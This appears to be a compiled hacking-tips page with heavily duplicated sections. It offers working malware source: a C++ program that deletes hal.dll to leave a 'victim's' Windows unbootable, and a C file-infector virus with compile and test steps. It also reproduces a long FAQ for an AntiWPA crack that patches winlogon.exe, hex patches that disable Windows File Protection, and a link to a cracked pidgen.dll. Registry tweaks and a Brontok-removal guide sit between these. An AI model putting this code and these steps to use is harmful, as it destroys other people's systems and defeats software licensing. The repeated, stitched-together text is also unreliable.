C++ virus
This is a powerful C++ virus, which deletes Hal.dll, something that is required for startup. After deleting that, it shuts down, never to start again.
Warning: Do not try this on your home computer.
The Original Code:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("C:\\windows\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
A more advanced version of this virus which makes the C:\Windows a variable that cannot be wrong. Here it is:
Code:
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove("%systemroot%\\system32\\hal.dll"); //PWNAGE TIME
system("shutdown -s -r");
system("PAUSE");
return EXIT_SUCCESS;
}
The second version would be more useful during times when you do not know the victims default drive. It might be drive N: for all you know
Virus in c
This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>
FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;
void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}
COMPILING METHOD:
USING BORLAND TC++ 3.0 (16-BIT):
1. Load the program in the compiler, press Alt-F9 to compile
2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)
3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)
4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)
5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect
USING BORLAND C++ 5.5 (32-BIT) :
1. Compile once,note down the generated EXE file length in bytes
2. Change the value of X in source code to this length in bytes
3. Recompile it.The new EXE file is ready to infect
HOW TO TEST:
1. Open new empty folder
2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)
3. Run the virus EXE file there you will see all the files in the current directory get infected.
4. All the infected files will be ready to reinfect
Remove Brontok Virus Urself
its the most sticky virus ..
u can Remove it
be an ethical Hacker
It works~~!!
Start ur computer in safe mode with command prompt and type the followinf command to enable registry editor:-
reg delete HKCU\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
and run HKLM\software\microsoft\windows\currentversion\policies\system /v "DisableRegistryTools"
after this ur registry editor is enable
type explorer
go to run and type regedit
then follow the following path :-
HKLM\Software\Microsoft\Windows\Currentversion\Run
on the right side delete the entries which contain 'Brontok' and 'Tok-' words.
after that restart ur system
open registry editor and follow the path to enable folder option in tools menu
HKCU\Software\Microsoft\Windows\Currentversion\Policies\Explorer\ 'NoFolderOption'
delete this entry and restart ur computer
and search *.exe files in all drives (search in hidden files also)
remove all files which are display likes as folder icon.
Want to remove shared documents
folder from My Computer window
tip:
Some don't like my shared documents folder option. If you are one of that, here is a trick to remove it.Open registry editor by going to START-RUN and entering regedit.
Once in registry, navigate to key HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.
Some don't like my shared documents folder option. If you are one of that, here is a trick to remove it.Open registry editor by going to START-RUN and entering regedit.
Once in registry, navigate to key HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ My Computer \ NameSpace \ DelegateFolders You must see a sub-key named {59031a47-3f72-44a7-89c5-5595fe6b30ee}. If you delete this key, you have effectively removed the my shared documents folder.
Lock your USB port
To do this you have to make a registry tweak taht will prevent writting to the usb port in Windows XP.
1) Go to 'Start|Run' and type 'Regedit'.
2) Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control.
3) Here add a new folder on the left pane by right clicking on it and selecting 'New|Key'.
4) Name this folder 'StorageDevicePolicies'.
5) Click this new folder and in the window on the right create a new DWORD value, lebel it WriteProtect, give it a value of '1'.
6) Now users will not be able to write any data on the USB.
To turn it off just set the value to '0'
1) Go to 'Start|Run' and type 'Regedit'.
2) Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control.
3) Here add a new folder on the left pane by right clicking on it and selecting 'New|Key'.
4) Name this folder 'StorageDevicePolicies'.
5) Click this new folder and in the window on the right create a new DWORD value, lebel it WriteProtect, give it a value of '1'.
6) Now users will not be able to write any data on the USB.
To turn it off just set the value to '0'
Lock Unlock Folder Using .bat file
Suppose you want to lock the folder games in d: which has the path D:\GamesIn the same drive create a text file and type
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat
create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat
Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folder.
try it out!!!!!!!
ren games games.{21EC2020-3AEA-1069-A2DD-08002B30309D}
Now save this text file as loc.bat
create another text file and type in it
ren games.{21EC2020-3AEA-1069-A2DD-08002B30309D} games
Now save this text file as key.bat
Now you can see 2 batch files loc and key.Press loc and the folder games will change to control panel and you cannot view its contents.Press key and you will get back your original folder.
try it out!!!!!!!
How to remove recycle bin from your
desktop Tip:
Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.
Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.
How to improve on shutdown time ? Close
apps automatically & quickly at shutdown
tip:
Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP and look for AutoEndTasks. On my computer default value is 0. Change it to 1. Thats all. Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications.
In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500 (since default value for HungAppTimeout 5000 and for WaitToKillAppTimeout is 20000)
Open Registry by going to START-RUN and typing REGEDIT. Navigate to HKEY_CURRENT_USER\CONTROL PANEL\DESKTOP and look for AutoEndTasks. On my computer default value is 0. Change it to 1. Thats all. Further more you can reduce the time it takes for Windows to issue kill directive to all active/hung applications.
In doing this only constraint that you should make sure exists is that HungAppTimeout is greater than WaitToKillAppTimeout. Change the values of WaitToKillAppTimeout to say 3500 (since default value for HungAppTimeout 5000 and for WaitToKillAppTimeout is 20000)
GENUINE windows activation tricks
I personally dont like doin this, but one cant deny the possiblities around,
This article i guess solve all the Enigma for the users surfing day and night in search of
keyword "Windows Xp hack" including specialized setups.
this is not recommended and u must use the genuine Softwares
especially the Operating Systems!!
-======================================-
Windows 2003 & XP & LH
Anti Product Activation
-======================================-
The crack will patch some bytes in your
winlogon.exe and totally disable the
Windows Product Activation Check.
Tested with winlogon.exe build:
Windows XP 2600.0 (Retail)
Windows 2K3 3790.0 (Retail)
Windows XP 2600.2180 (SP2 RTM)
Windows XP 2600.1106 (SP1)
Windows 2K3 3790.1218 (8.7.2004)
Windows Longhorn 4008 or 4015(not tested by myself)
This version uses a generic patch engine
which supports all current version of Windows
and hopefully all future ones. :)
The Options
===========
1. Read all about the options.
2. Don't change anything you without a reason.
* Apply OOBE Fix
This applies the Out Of Box Experience ->OOBE Patch
which removes the 'Activate Windows' link from the
start menu and makes the Activating Windows Dialog
saying 'Already Activated'
Note: This is more a cosmetically fix and really not
needed for the patch to work properly.
* Apply WPA Fix
This removes the WPA-Check in Winlogon.exe.
If you want to get rid of the Windows Activation
this MUST be Enabled !
Disable this if you just want to undo the OOBE-Fix.
Note: However you can use this program also to
decrypt and unprotect other MS-Files
like DPCDLL.dll or LICDLL.DLL. So if you
do so disable this option.
* Remove selfcheck blocks
If you press the 'Apply' Button the self checks are always
disable by 'correcting' the pointer.
This option will additionally overwrite the self check block
calls in the program code with the Value 90 (NOP=No OPeration)
and will improve the readability of disassembly.
Note: This option is absolutely not necessary for the patch to work.
* Remove crypt blocks
This will decrypt the crypt program parts of the input file and
write them back to into the exe and do some other fixes to keep the
File executable. If you want to disassemble the file enable this one.
Note: This option is absolutely not necessary for the patch to work.
* Debug: Save decrypted code to *.bin
Writes each decrypted program parts into a file with the
address as filename looking like this: 2C18D.bin, 3678B.bin...
* Debug: Save decrypted code to exe
Writes each decrypted program parts back into the file.
If the option 'Remove crypt blocks' is not check just the decrypted
RAW-Output is written into the exe. (After you enable this you
have to right click on 'Apply/Browse' and open the file you want
to decrypt)
Note: This option is dangerous!
Without having 'Remove crypt blocks' option enabled this will
make crash the input file crash for sure.
This option is absolutely not necessary for the patch to work.
* Debug: Verbose Output
Output Debug information
This may be helpful to identify some problems.
==================================================
F A Q - Frequently Asked Questions
==================================================
????????????????????????????????????????????????????????????????????????????????
I after I have installed a Service pack an the Activation the
Activation Reminder ?counting down the days -is show again.
????????????????????????????????????????????????????????????????????????????????
You must reapply the patch every time after you installed a servicepack and
everything will be fine :)
Note: The Patch don?t ?activated? Windows it only removes the check in winlogon.exe
which test if windows is activated or if it?s still in the evaluation period
and force you to logoff if something is wrong.
When you install a servicepack winlogon.exe is normally overwritten by a new
Not patched Version. So you need reapply the patch?
Usually the servicepack reset the trial counter so it will restart at 30 days.
????????????????????????????????????????????????????????????????????????????????
I can?t start patch because my evaluation period expired and
Now I?m unable to login.
????????????????????????????????????????????????????????????????????????????????
You can still login in safe mode even if your evaluation period expired.
Press F8 right after the Bios boot screen and select Safe Mode
(Without Network support) menu now windows should boot in safe mode and you can
Login and apply the Anti-WPA-Patch.
Note: Since no Network support is available in safe mode no Internet or Network
Is available so it?s good to have the patch somewhere on the hard disk or on a
floppy disk?
If you select Safe Mode (with Network support) you are unable to login due to
Activation is necessary.
????????????????????????????????????????????????????????????????????????????????
I want to change my CD-Key - but msoobe.exe also says
'Already Activated and don't show the Activation Dialog
????????????????????????????????????????????????????????????????????????????????
Enable option 'Apply OOBE Fix' and
Disable option 'Apply &WPA Fix' -to keep the WPA-Patch active-
then click on the 'Restore Backup' Button
PREVIOUS VERSIONS:
Start regedit and go to
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents\[OOBETimer]
Edit this and set Last Byte to FF.
Start this -if the Activation are delete- to show the Activation dialog:
%SYSTEMROOT%\system32\oobe\msoobe.exe /A
????????????????????????????????????????????????????????????????????????????????
Is it possible to integrate WPA_KILL.EXE in the WinXP setup-routine?
I have a WinXP pro setup CD (sp2 integrated).
????????????????????????????????????????????????????????????????????????????????
Integrating the AntiWPA Patch in the Windows Setup:
1. Extract [WindowsSetupDir]\i386\winlogon.ex_ to a temporary Dir.
(Winrar or winace will do the job - or rename it to winlogon.cab and
double-click on it - to use the build-in WindowsCabExtract)
2. Apply the WPA Crack to the file.
Right click on 'Apply/Browse' and choose the file.
(To unlock all buttons of the WPA-Patch right click on 'Quit')
3. Repack winlogon.exe an put it back in the installation folder
Use Winace (and choose MS-Cab as compression method) and name
the packed cab-file winlogon.ex_.
Or use the makecab.exe(included in Windows XP) start cmd.exe in the dir
winlogon.exe is in and Enter:
makecab winlogon.exe
After that you will get winlogon.ex _ as output.
PREVIOUS VERSIONS:
In previous versions the PE Checksum of the file wasn't updated by the patch.
This caused setup to reject winlogon.exe during installation.
But this has been fixed in this version.
Manually OOBE_Fix for WindowsSetup
----------------------------------
Since I see people integrating the patched winlogon.exe into windows setup are
perfectionist here's a hint how to may you get rid of the activationlinks in
the startmenu (-untested-):
Ok unpack and edit syssetup.inf
1. search for
[StartMenuCommon]
and delete this to avoid the activate link in START
%oobe_desc% = oobe\msoobe.exe,"%%SYSTEMROOT%%\system32\oobe\msoobe.exe /A",,0,"@%SystemRoot%\system32\oobe\msoobe.exe,-2001","%SystemRoot%\system32\oobe\msoobe.exe",2000
(btw you can also delete this unless %windowscatalog% link section if you like)
2. In SystemTools it's the same
[SystemTools]
%oobe_desc% = oobe\msoobe.ex...
Just for better understanding the inf-file format at the end is defined what the variable "oobe_desc" is:
oobe_desc = "Windows aktivieren"
This was were I first stepped when I searched for "Windows aktivieren" in C:\windows
The second was to look for oobe_desc...
No-CDKey-Patch for WindowsSetup
-------------------------------
- Since I got some positiv feedback about this I decided to publish this.
But so far I'ven't test it myself-
This will make the WindowsSetup to accept any -even a blank- CDKey
Get "http://antiwpa.cjb.net/Other/cracked pidgen for setup.rar"
Pack it pidgen.dll with cab-pack to pidgen.dl_ as decribed above
and put it in the I386 setupdir.
That's it.
??????????????????????????????????????????????????????????????????????????????????
What changes does this patch to my System and how to undo it?
????????????????????????????????????????????????????????????????????????????????
1. It modifies c:\WINDOWS\system32\Winlogon.exe and creates a
backup named Winlogon.bak
UNDO: Rename Winlogon.exe -> Winlogon.OUT
Rename Winlogon.bak -> Winlogon.exe
After Reboot you will be able to delete Winlogon.OUT if you like
2. The RegistryValue
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents\[OOBETimer]
is set to a fixed value as it is activated.
UNDO: Edit this with Regedit and set Last Byte to FF.
This will 'DeActivate' Windows
Note: Normally this value is written (not read!) by winlogon.exe on
every start up just as information for MSOOBE.
This value has no effect on the real Activation.
3. The 'Activate Windows' Link from the Startmenu is remove
UNDO: Start\Execute:
rundll32 setupapi,InstallHinfSection RESTORE_OOBE_ACTIVATE 132 syssetup.inf
Other Changes:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
"SourcePath" and "ServicePackSourcePath" will be temporary delete during the patch
and (if nothing real bad happens) restored if it's finished.
????????????????????????????????????????????????????????????????????????????????
How to set another path to Winlogon.exe?
????????????????????????????????????????????????????????????????????????????????
Right click on the 'Apply/Browse' button.
If the Patch is already and the 'Apply/Browse' button is greyed out
Right click on the 'Quit' button to force unlock all buttons.
Note: You can also use the Windows Anti WPA Patch to de-protect
(Remove SelfCheckBlock SCB) from other protected
Microsoft exe and dll's:
For ex: licdll.dll, DPCDLL.dll or Windows PLUS! Pack Executables
Of course the WPA-Patch is skipped in this case.
????????????????????????????????????????????????????????????????????????????????
The Patch doesn't work after I rebooted, the WPA Reminder pops up again.
Also during the Patch the Windows Systemfile Protection Dialogbox didn't
come up.
????????????????????????????????????????????????????????????????????????????????
Maybe the Patch was undone by the Windows File Protection.
To check if the patch is still active start the Windows Anti WPA Patch again and check if it says 'Patch already applied'.
????????????????????????????????????????????????????????????????????????????????
How to disable this damn Windows File Protection(WFP)?
????????????????????????????????????????????????????????????????????????????????
There is no really official way to disable this
This is an undocumented setting worked for recent windows versions:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SFCDisable=0xffffff9d
BUT: It was removed in Windows 2000 Service Pack 2 and in Windows XP!
When you restart your computer, the System event log will contain Event ID 64032, "Windows File Protection is not active on this system."
SFCDisable (REG_DWORD)
0 = enabled (default - WinXP Professional)
1 = disabled, prompt at boot to re-enable - Require a kernel debugger to be hooked up or this will be ignored!
2 = disabled at next boot only, no prompt to re-enable - Require a kernel debugger to be hooked up or this will be ignored!
4 = enabled, with popups disabled (default - for all Server Windows)
More about this and how to re-enable the 'SFCDisable=0xffffff9d-setting'
-> http://www.collakesoftware.com/aboutwfp.htm
To make this more flexible here is a search'n'replace patch:
(Rename sfc_os.dll to sfc_os.OUT; copy sfc_os.OUT to sfc_os.dll)
Open sfc_os.dll in a hex editor
Search for : 83 f8 9D 75 08 33 C0 40
Replace with: 83 f8 9D EB 08 33 C0 40
So this is where it comes from:
A1 D8E1C376 MOV EAX, [SFCDisable]
Patch- > 83F8 9D CMP EAX, -63 ; = 0xffffff9d !
Search > 75 08 JNZ SHORT Don't_Set_SFCDisable_=_1
Data > 33C0 XOR EAX, EAX
> 40 INC EAX
A3 D8E1C376 MOV [SFCDisable], EAX
:Don't_Set_SFCDisable
Btw this fragment is the reason 0xffffff9d don't work anymore - so alternatively Nop Out (=overwrite with 0x90) that bastard
Well I found a real simple way to disable this for sure:
Rename c:\WINDOWS\system32\sfc.dll to sfc-OUT.dll to something else
After Reboot the WFP is disabled.
BUT I advice to rename sfc-OUT.dll back to sfc.dll soon because I notice
that you can't install any new hardware device driver because syssetup.dll
statically imports sfc.dll and fail to load if sfc.dll is not found.
?????????????????????????????????????????????????????????????????????????????????????????????
The Patcher doesn?t find any offset. / Know problem on Asian systems.
?????????????????????????????????????????????????????????????????????????????????????????????
WPA_KILL.EXE currently don't work with Asian Systems (Taiwan , Japan ...) with DBCS (Double Character Set)
enabled. If you have such systems disable DBCS or patch your winlogon.exe on a non DBCS system
apply the patch and copy it back in your system.
As far as I found out the Test Version function does not work properly and you get 'unknown Version'.
A Workaround that might work is to use the offset locator to detect/set the right offset manually.
(Hint: Compare the detected offset with the known-offset-list)
The problem is related to some improper char handling and/or comparing inside FrmMain.Test() i.e FileStream::FixedString()
Everyone how has an Asian System and MSOffice(Note: VBA is always also installed together with MSO) or Visual Basic 6 is welcome to invite me to a remote Session. - so I can examine and fix that problem - Please send me an email...
And of course you?re also welcome to fix it your self:
\other\cracknfo\problem-onasian-systems.rar
\SRC\antiwpa-1.6.2-winxp-2k3-src.zip
?????????????????????????????????????????????????????????????????????????????????????????????
How you access/modify the winlogon.exe file while the winlogon process is running ?
I only saw you are using standart API calls but I must have missed something...
???????????????????????????????????????????????????????????????????????????????????????????
How to modify a File (like winlogon.exe) while it is in use:
1.Rename winlogon.exe -> winlogon.bak
That's the most important thing about that. You can't delete or
modify a file that's in use, but you can RENAME it! (under Win9x
this don't work. But there you can rename the dir the file is in...)
2.Copy winlogon.bak -> winlogon.exe
3.Now you can edit winlogon.exe. Of course you can't delete (or
modify) winlogon.bak as long as it is in use.
But you surely want to keep an backup of it, don't you?
Oh I almost forgot to mention an other annoy thing:
>The Windows system File Protection (WFP) 'D:\installs\WinXP_SP2.out'
So the WFP won't file them to restore
Well the WPA-Patch doesn't rename your Windows installation path it deletes temporary the path to this in you registry and restores it after the patch (actually after you clicked on the OK button of the messagebox).
These Registry paths are:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
"SourcePath"= "D:\installs\WinXP_CD"
"ServicePackSourcePath" ="D:\installs\WinXP_SP2"
----------------------------------------------------------
Just a hint to see if the patch worked without to Reboot:
1.Apply the patch
2.Logon as an other user
(But don't log of - choose change/disconnect user)
3.When you login just see if the patch works...
... or if not this damn
'You haven't activated your Windows yet...' message
(4.If you logoff the first user now 'winlogon.bak' is no long in use
and you can delete/modify it)
Ah and to get a better overview about the processes which are running on your machine use this: http://www.sysinternals.com/ntw2k/freeware/procexp.shtml
And next time you can't delete a files use 'search handle' and enter the filename then close the handle(=file) or kill the process...
?????????????????????????????????????????????????????????????????????????????????????????????
Does the AntiWPA Crack make winlogon.exe unstable?
?????????????????????????????????????????????????????????????????????????????????????????????
Since the WPA 1.6.2 disables all anti crack self checks in winlogon.exe it may execute some msec faster :)
The patch simply makes winlogon.exe to skip the function which will do the WPA-Check( update of WPA Trialcounter)
and block any login if the result is 'negative'.
From 'outside' this windows is simple not activated but as long your using a valid CDKEY Windows update will work and is not affected by the WPA-Patch
> does the patch make winlogon.exe unstable?
No. If it is applied correctly winlogon.exe will not become unstable/crash.
(The only time winlogon.exe becomes unstable is after appling wpa-kill 1.1 to WinXP SP1 - but this bug was fix in version 1.2...)
Of course with the wrong offset in offset locator you can make winlogon.exe unstable/crash or by killing the patcher during the patch is applied.
????????????????????????????????????????????????????????????????????????????????
PREVIOUS VERSIONS:
I got 'ERROR: Unknown Version of winlogon.exe'.
Can you include this version in your WPA-Patcher ?
????????????????????????????????????????????????????????????????????????????????
Well please try the offset locator button to patch this new Version. Since Version 1.4 I added a heuristic search for offset locator which should find the right offset by default and highlight it.
So -after you read the warning- just double click on the highlight Offset on the List to set this as new patch-Offset.
If this is not a Beta or Release Candidate Version send me your -unpatched- Winlogon.exe by email and add if the default offset (found by the for offset locator) works.
????????????????????????????????????????????????????????????????????????????????
PREVIOUS VERSIONS:
The patch don't work - if i click on the 'Activate Windows' link in the
start menu, it says Windows isn't activated and that there are only xx days left.
????????????????????????????????????????????????????????????????????????????????
This patch didn't stop the trial counter nor will it 'Activate' your Windows.
The WPA-Patch fixes the condition jump which decides whether windows was started in safe mode
and the activation check should be skipped or if it was started in normal mode and it should be done.
So in short it will make winlogon.exe to skip the is-Windows-activated check when you logon.
To see if the patch work wait about one minute after you logon -
if the Activation reminder balloon in the tray bar DON'T pop up - the patch IS working.
Some other things to see that it works
The messagebox that reminders you to active if there are only 5 days left and
The messagebox that says you're not allowed to logon until you active will be away.
So patching msobmain.dll just to make it say it's activated is only additional overheat and
also may cause some problems. Maybe if you want to change your CDKey and you don't reach the CDKEY change dialog because it says already activated...
Ok what I need to do is to include some FAQ-info text in the next version about that issue.
Maybe I will add a "Let's Activate Windows" force true patch if there is such a big need for this
I mean if this will make someone sleeps better at night - is enough for a good reason.
This article i guess solve all the Enigma for the users surfing day and night in search of
keyword "Windows Xp hack" including specialized setups.
this is not recommended and u must use the genuine Softwares
especially the Operating Systems!!
-======================================-
Windows 2003 & XP & LH
Anti Product Activation
-======================================-
The crack will patch some bytes in your
winlogon.exe and totally disable the
Windows Product Activation Check.
Tested with winlogon.exe build:
Windows XP 2600.0 (Retail)
Windows 2K3 3790.0 (Retail)
Windows XP 2600.2180 (SP2 RTM)
Windows XP 2600.1106 (SP1)
Windows 2K3 3790.1218 (8.7.2004)
Windows Longhorn 4008 or 4015(not tested by myself)
This version uses a generic patch engine
which supports all current version of Windows
and hopefully all future ones. :)
The Options
===========
1. Read all about the options.
2. Don't change anything you without a reason.
* Apply OOBE Fix
This applies the Out Of Box Experience ->OOBE Patch
which removes the 'Activate Windows' link from the
start menu and makes the Activating Windows Dialog
saying 'Already Activated'
Note: This is more a cosmetically fix and really not
needed for the patch to work properly.
* Apply WPA Fix
This removes the WPA-Check in Winlogon.exe.
If you want to get rid of the Windows Activation
this MUST be Enabled !
Disable this if you just want to undo the OOBE-Fix.
Note: However you can use this program also to
decrypt and unprotect other MS-Files
like DPCDLL.dll or LICDLL.DLL. So if you
do so disable this option.
* Remove selfcheck blocks
If you press the 'Apply' Button the self checks are always
disable by 'correcting' the pointer.
This option will additionally overwrite the self check block
calls in the program code with the Value 90 (NOP=No OPeration)
and will improve the readability of disassembly.
Note: This option is absolutely not necessary for the patch to work.
* Remove crypt blocks
This will decrypt the crypt program parts of the input file and
write them back to into the exe and do some other fixes to keep the
File executable. If you want to disassemble the file enable this one.
Note: This option is absolutely not necessary for the patch to work.
* Debug: Save decrypted code to *.bin
Writes each decrypted program parts into a file with the
address as filename looking like this: 2C18D.bin, 3678B.bin...
* Debug: Save decrypted code to exe
Writes each decrypted program parts back into the file.
If the option 'Remove crypt blocks' is not check just the decrypted
RAW-Output is written into the exe. (After you enable this you
have to right click on 'Apply/Browse' and open the file you want
to decrypt)
Note: This option is dangerous!
Without having 'Remove crypt blocks' option enabled this will
make crash the input file crash for sure.
This option is absolutely not necessary for the patch to work.
* Debug: Verbose Output
Output Debug information
This may be helpful to identify some problems.
==================================================
F A Q - Frequently Asked Questions
==================================================
????????????????????????????????????????????????????????????????????????????????
I after I have installed a Service pack an the Activation the
Activation Reminder ?counting down the days -is show again.
????????????????????????????????????????????????????????????????????????????????
You must reapply the patch every time after you installed a servicepack and
everything will be fine :)
Note: The Patch don?t ?activated? Windows it only removes the check in winlogon.exe
which test if windows is activated or if it?s still in the evaluation period
and force you to logoff if something is wrong.
When you install a servicepack winlogon.exe is normally overwritten by a new
Not patched Version. So you need reapply the patch?
Usually the servicepack reset the trial counter so it will restart at 30 days.
????????????????????????????????????????????????????????????????????????????????
I can?t start patch because my evaluation period expired and
Now I?m unable to login.
????????????????????????????????????????????????????????????????????????????????
You can still login in safe mode even if your evaluation period expired.
Press F8 right after the Bios boot screen and select Safe Mode
(Without Network support) menu now windows should boot in safe mode and you can
Login and apply the Anti-WPA-Patch.
Note: Since no Network support is available in safe mode no Internet or Network
Is available so it?s good to have the patch somewhere on the hard disk or on a
floppy disk?
If you select Safe Mode (with Network support) you are unable to login due to
Activation is necessary.
????????????????????????????????????????????????????????????????????????????????
I want to change my CD-Key - but msoobe.exe also says
'Already Activated and don't show the Activation Dialog
????????????????????????????????????????????????????????????????????????????????
Enable option 'Apply OOBE Fix' and
Disable option 'Apply &WPA Fix' -to keep the WPA-Patch active-
then click on the 'Restore Backup' Button
PREVIOUS VERSIONS:
Start regedit and go to
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents\[OOBETimer]
Edit this and set Last Byte to FF.
Start this -if the Activation are delete- to show the Activation dialog:
%SYSTEMROOT%\system32\oobe\msoobe.exe /A
????????????????????????????????????????????????????????????????????????????????
Is it possible to integrate WPA_KILL.EXE in the WinXP setup-routine?
I have a WinXP pro setup CD (sp2 integrated).
????????????????????????????????????????????????????????????????????????????????
Integrating the AntiWPA Patch in the Windows Setup:
1. Extract [WindowsSetupDir]\i386\winlogon.ex_ to a temporary Dir.
(Winrar or winace will do the job - or rename it to winlogon.cab and
double-click on it - to use the build-in WindowsCabExtract)
2. Apply the WPA Crack to the file.
Right click on 'Apply/Browse' and choose the file.
(To unlock all buttons of the WPA-Patch right click on 'Quit')
3. Repack winlogon.exe an put it back in the installation folder
Use Winace (and choose MS-Cab as compression method) and name
the packed cab-file winlogon.ex_.
Or use the makecab.exe(included in Windows XP) start cmd.exe in the dir
winlogon.exe is in and Enter:
makecab winlogon.exe
After that you will get winlogon.ex _ as output.
PREVIOUS VERSIONS:
In previous versions the PE Checksum of the file wasn't updated by the patch.
This caused setup to reject winlogon.exe during installation.
But this has been fixed in this version.
Manually OOBE_Fix for WindowsSetup
----------------------------------
Since I see people integrating the patched winlogon.exe into windows setup are
perfectionist here's a hint how to may you get rid of the activationlinks in
the startmenu (-untested-):
Ok unpack and edit syssetup.inf
1. search for
[StartMenuCommon]
and delete this to avoid the activate link in START
%oobe_desc% = oobe\msoobe.exe,"%%SYSTEMROOT%%\system32\oobe\msoobe.exe /A",,0,"@%SystemRoot%\system32\oobe\msoobe.exe,-2001","%SystemRoot%\system32\oobe\msoobe.exe",2000
(btw you can also delete this unless %windowscatalog% link section if you like)
2. In SystemTools it's the same
[SystemTools]
%oobe_desc% = oobe\msoobe.ex...
Just for better understanding the inf-file format at the end is defined what the variable "oobe_desc" is:
oobe_desc = "Windows aktivieren"
This was were I first stepped when I searched for "Windows aktivieren" in C:\windows
The second was to look for oobe_desc...
No-CDKey-Patch for WindowsSetup
-------------------------------
- Since I got some positiv feedback about this I decided to publish this.
But so far I'ven't test it myself-
This will make the WindowsSetup to accept any -even a blank- CDKey
Get "http://antiwpa.cjb.net/Other/cracked pidgen for setup.rar"
Pack it pidgen.dll with cab-pack to pidgen.dl_ as decribed above
and put it in the I386 setupdir.
That's it.
??????????????????????????????????????????????????????????????????????????????????
What changes does this patch to my System and how to undo it?
????????????????????????????????????????????????????????????????????????????????
1. It modifies c:\WINDOWS\system32\Winlogon.exe and creates a
backup named Winlogon.bak
UNDO: Rename Winlogon.exe -> Winlogon.OUT
Rename Winlogon.bak -> Winlogon.exe
After Reboot you will be able to delete Winlogon.OUT if you like
2. The RegistryValue
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents\[OOBETimer]
is set to a fixed value as it is activated.
UNDO: Edit this with Regedit and set Last Byte to FF.
This will 'DeActivate' Windows
Note: Normally this value is written (not read!) by winlogon.exe on
every start up just as information for MSOOBE.
This value has no effect on the real Activation.
3. The 'Activate Windows' Link from the Startmenu is remove
UNDO: Start\Execute:
rundll32 setupapi,InstallHinfSection RESTORE_OOBE_ACTIVATE 132 syssetup.inf
Other Changes:
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Setup
"SourcePath" and "ServicePackSourcePath" will be temporary delete during the patch
